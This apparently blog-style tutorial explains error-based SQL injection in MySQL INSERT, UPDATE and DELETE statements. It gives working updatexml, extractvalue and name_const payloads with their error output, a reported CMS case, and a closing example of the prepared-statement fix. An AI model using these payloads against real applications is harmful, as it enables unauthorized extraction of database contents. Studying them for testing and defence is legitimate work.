The most common SQL injection is in SELECT queries, but any statement that writes unchecked, unfiltered input into the database can be injected just the same. Beyond queries, every kind of interaction with the database is a potential injection point: inserting data, changing data and deleting data. This post summarises the INSERT, UPDATE and DELETE injection techniques collected from material online.
The tests below are error-based injection against MySQL 5.7.21, using the built-in functions updatexml(), extractvalue() and name_const().
The test table is as follows (the screenshot is not reproduced here; the columns used in the tests are id, name and age):
1. The updatexml() function
UPDATEXML(XML_document, XPath_string, new_value);
First argument: XML_document, a string, the XML document object (in the manual's examples it is called Doc)
Second argument: XPath_string, an XPath expression; if you are not familiar with XPath syntax, any online tutorial will do
Third argument: new_value, a string that replaces the data matched by the XPath expression
Function: changes the value of the nodes in XML_document that match XPath_string
Our injection statement:
updatexml(1, concat(0x7e, (SELECT @@version), 0x7e), 1)
concat() joins its arguments into one string. Because that string (it starts with ~, 0x7e) is not valid XPath, MySQL raises a syntax error and echoes the offending string in the error message, for example:
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
payload:
or updatexml(1,concat(0x7e,(version())),0) or
The payload is shaped to sit inside a quoted string value, as in 'wangwu' or updatexml(...) or '': the leading or breaks out of the string literal the application wraps around the value, and the trailing or '' consumes the application's own closing quote so the statement stays syntactically valid.
INSERT injection test:
mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
UPDATE injection test (payload in the SET value, then in the WHERE clause):
mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
DELETE injection test:
mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
2. The extractvalue() function
extractvalue(): queries an XML document
It is much like locating elements in an HTML document by their <div>, <p> or <a> tags.
Syntax: extractvalue(target XML document, XML path)
The second argument is the position in the XML document to extract, written as an XPath of the form /xxx/xxx/xxx/... . If we pass something in a different format, MySQL raises an error and echoes the illegally formatted content back, and that echoed content is exactly the data we want to query.
If the second argument is a well-formed path (/xxx/xx/xx/xx), no error is raised even when nothing is found, so nothing leaks.
payload:
or extractvalue(1,concat(0x7e,database())) or
INSERT injection test:
mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
UPDATE injection test:
mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
DELETE injection test:
mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
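Three practical limits that the updatexml() and extractvalue() tests above run into, as an added example (MySQL 5.7; this is not part of the original post). The test table is reconstructed from the columns used above because the original screenshot did not survive, and the row values are made up. First, the error aborts the statement, so the DML never takes effect; second, the XPath error echoes at most 32 characters, so longer results have to be paged with SUBSTR(); third, an UPDATE or DELETE cannot read from the table it modifies in a subquery (ERROR 1093), which matters when the data you want lives in that very table.

```sql
-- Added example, not from the original post. Assumes MySQL 5.7.x.
-- Reconstructed test table (assumption: the original screenshot only showed id, name, age).
CREATE TABLE IF NOT EXISTS info (
  id   INT AUTO_INCREMENT PRIMARY KEY,
  name VARCHAR(64),
  age  VARCHAR(8)
);
INSERT INTO info (name, age) VALUES ('zhangsan', '20'), ('lisi', '21');  -- constructed rows

-- (1) The error aborts the statement, so the injected DELETE removes nothing: the row
--     count is the same before and after. This only holds because updatexml() raises;
--     "WHERE id = 1 OR <expression that evaluates true>" would delete every row.
SELECT COUNT(*) FROM info;
DELETE FROM info WHERE id = 1 OR updatexml(1, CONCAT(0x7e, version()), 0);
-- ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
SELECT COUNT(*) FROM info;

-- (2) The XPath error shows at most 32 characters of the bad string, one of them the
--     leading ~. A long result such as the table list of the current database is cut off:
DELETE FROM info WHERE id = 1 OR extractvalue(1, CONCAT(0x7e,
  (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
    WHERE table_schema = DATABASE())));

--     Page through it 31 characters at a time with SUBSTR(str, pos, len):
DELETE FROM info WHERE id = 1 OR extractvalue(1, CONCAT(0x7e, SUBSTR(
  (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
    WHERE table_schema = DATABASE()), 1, 31)));
DELETE FROM info WHERE id = 1 OR extractvalue(1, CONCAT(0x7e, SUBSTR(
  (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
    WHERE table_schema = DATABASE()), 32, 31)));

-- (3) Reading from the table being modified fails with
--     ERROR 1093: You can't specify target table 'info' for update in FROM clause
UPDATE info SET name = 'test' WHERE id = 1 OR updatexml(1, CONCAT(0x7e,
  (SELECT name FROM info ORDER BY id LIMIT 1)), 0);

--     Wrapping the subquery in a derived table works around it. The LIMIT inside the
--     derived table stops the 5.7 derived_merge optimisation from folding it back into
--     the outer statement, which would bring ERROR 1093 back. The XPath error now
--     carries the first row's name.
UPDATE info SET name = 'test' WHERE id = 1 OR updatexml(1, CONCAT(0x7e,
  (SELECT name FROM (SELECT name FROM info ORDER BY id LIMIT 1) x)), 0);
```

The same three points apply unchanged to INSERT: the values list is evaluated before the row is written, the 32-character cap is a property of the XPath error message rather than of the statement, and an INSERT reading from its own table in a subquery hits the same ERROR 1093.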
3. The name_const() function
name_const(name, value)
Returns the given value. When used to produce a result-set column, name_const() causes the column to have the given name. Selecting two columns with the same name from a derived table fails with a "Duplicate column name" error that echoes the name, which is what the payload exploits.
payload:
or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or
INSERT injection test:
mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'
UPDATE injection test:
mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'
DELETE injection test:
mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'
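Why the name_const() payload above only ever shows the version string, as an added example (MySQL 5.7; not part of the original post): name_const() requires constant arguments, and version() is accepted because MySQL evaluates it as a constant, whereas user(), database() or a subquery are rejected before the duplicate-column check is reached.

```sql
-- Added example, not from the original post. Assumes MySQL 5.7.x.
-- The duplicate-column trick needs two result columns with the same name, hence the
-- two name_const() calls. version() is accepted as a constant, so the derived table
-- ends up with two columns both named after the version string:
SELECT * FROM (SELECT name_const(version(), 1), name_const(version(), 1)) a;
-- ERROR 1060 (42S21): Duplicate column name '5.7.21'

-- name_const() insists on constant arguments. A non-constant name fails with
-- ERROR 1210 (HY000): Incorrect arguments to NAME_CONST, before any column is named,
-- so the trick cannot be used to read user(), database() or a subquery result:
SELECT * FROM (SELECT name_const(user(), 1), name_const(user(), 1)) a;
SELECT * FROM (SELECT name_const((SELECT DATABASE()), 1), name_const((SELECT DATABASE()), 1)) a;

-- For anything other than the version string, use updatexml() or extractvalue()
-- from the sections above instead.
```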
Reference Links: https://www.cnblogs.com/r00tgrok/p/3854754.html
Real-world test:
HongCMS has a SQL injection in the backend's clear-table function, i.e. a DELETE injection.
Details: https://www.freebuf.com/vuls/178316.html
The updatexml, extractvalue and name_const payloads were each run against it; the screenshots of the three payloads are not reproduced here.
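What separates the vulnerable pattern from the fix, shown entirely inside MySQL as an added example (MySQL 5.7; this is not HongCMS code, which the page does not reproduce, and the info table and its rows are the same constructed ones as above). A server-side prepared statement built from a concatenated string reproduces what an application doing string concatenation sends, and a prepared statement with a bound parameter is the hardened form.

```sql
-- Added example, not HongCMS code. Assumes MySQL 5.7.x and the constructed info table.
CREATE TABLE IF NOT EXISTS info (id INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(64), age VARCHAR(8));
INSERT INTO info (name, age) VALUES ('zhangsan', '20'), ('lisi', '21');

-- The request parameter: a valid id with the DELETE payload from above appended.
SET @user_input = '1 or updatexml(1,concat(0x7e,version()),0)';

-- Vulnerable pattern: the id is spliced into the statement text, so the parser sees
-- "... WHERE id = 1 or updatexml(...)" and the injected function executes.
SET @sql = CONCAT('DELETE FROM info WHERE id = ', @user_input);
PREPARE vuln FROM @sql;
EXECUTE vuln;
-- ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
DEALLOCATE PREPARE vuln;

-- Hardened pattern: the statement is parsed first with a placeholder and the value is
-- bound afterwards. The payload is now a plain string; compared with the INT column it
-- converts to 1 (MySQL warns "Truncated incorrect DOUBLE value"), so only row 1 is
-- deleted and no function call is ever parsed out of the input.
PREPARE safe FROM 'DELETE FROM info WHERE id = ?';
EXECUTE safe USING @user_input;
SHOW WARNINGS;
DEALLOCATE PREPARE safe;
SELECT id, name FROM info;
```

In application code the same separation is what client-side prepared statements (PDO, JDBC, MySQLdb) provide; validating that the id is an integer before binding it removes the truncation warning as well.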